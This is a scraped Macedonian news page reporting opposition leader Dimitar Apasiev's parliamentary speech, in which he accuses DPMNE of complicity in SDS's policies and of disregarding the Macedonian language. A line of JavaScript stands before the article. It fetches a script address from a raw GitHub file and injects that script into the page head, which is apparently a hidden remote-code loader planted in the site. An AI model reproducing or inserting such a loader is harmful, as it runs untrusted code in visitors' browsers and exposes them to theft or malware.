;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Апасиев: ДПМНЕ беше соучесник во сите валкани работи на СДС - Антропол
АктуелноЛокално

Апасиев: ДПМНЕ беше соучесник во сите валкани работи на СДС

Лидерот на опозицијата Димитар Апасиев на собраниската говорница констатираше дека ДПМНЕ ја продолжува политиката која ја воспостави СДС, особено што се однесува до почитувањето на македонскиот јазик, кој беше погазен уште на конститутивната Седница, кога мнозинството предводено од Мицкоски го избра Африм Гаши за претседател на собранието.

Вие правите косоваризација на Македонија. Ќе нема парламент во светот на кој што ќе се претседава на македонски јазик! Двојазичните документи за којшто вашата сегашна претседателка Сиљановска климаше со глава кога со Мицевски приговаравме зошто ни се даваат двојазично, истата таа пракса ќе продолжи и сега.

Апасиев потсети дека погубната политика на СДС беше спроведена во соучестништво на ДПМНЕ, за кое, како што вели, порано или подоцна сите ќе го воочат.

Вие се радувате потајно што СДС ги заврши сите валкани работи! Но не почитувани, во кривично право има термин кој се вика соучесништво. Вие бевте соучесници во сите нивни валкани работи! И тие соучесници одговараат исто како и непосредните извршители!